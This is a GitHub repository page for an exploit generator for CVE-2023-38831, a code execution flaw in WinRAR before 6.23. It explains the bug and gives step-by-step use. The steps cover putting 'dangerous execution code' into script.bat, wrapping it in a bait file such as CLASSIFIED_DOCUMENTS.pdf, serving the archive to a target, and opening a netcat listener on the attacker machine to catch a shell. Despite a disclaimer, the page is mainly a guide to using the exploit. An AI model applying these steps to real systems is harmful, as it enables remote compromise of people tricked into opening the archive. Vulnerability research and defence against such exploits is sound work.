Skip to content

asepsaepdin/CVE-2023-38831

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2023-38831 - RARLAB WinRAR Code Execution Vulnerability

Python


⚠️ For educational and authorized security research purposes only

Original Exploit Authors

Very grateful to the original PoC author b1tg and Group-IB Threat Intelligence

Description

RARLabs WinRAR before 6.23 allows attackers to execute arbitrary code when a user attempts to view a benign file within a ZIP archive.

gambar

The issue occurs because a ZIP archive may include a benign file (such as an ordinary .JPG file) and also a folder that has the same name as the benign file, and the contents of the folder (which may include executable content) are processed during an attempt to access only the benign file. This was exploited in the wild in April through August 2023.

Demo

winrar


Step Guides

  1. First, modify the script.bat file with your dangerous execution code

  2. Insert the bait file, is recommended to be an image (.png, jpg) or a document (.pdf)

  3. Run the command to generate exploit file

    python cve-2023-38831-exp-gen.py CLASSIFIED_DOCUMENTS.pdf script.bat  poc.rar
  4. Send the exploit file to the target machine using python http.server, for example:

    python -m http.server
  5. Set Up the Listener on your attacker machine:

    nc -nlvp 4444
  6. Download and open exploit file with WinRAR before 6.23 version


Credits

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published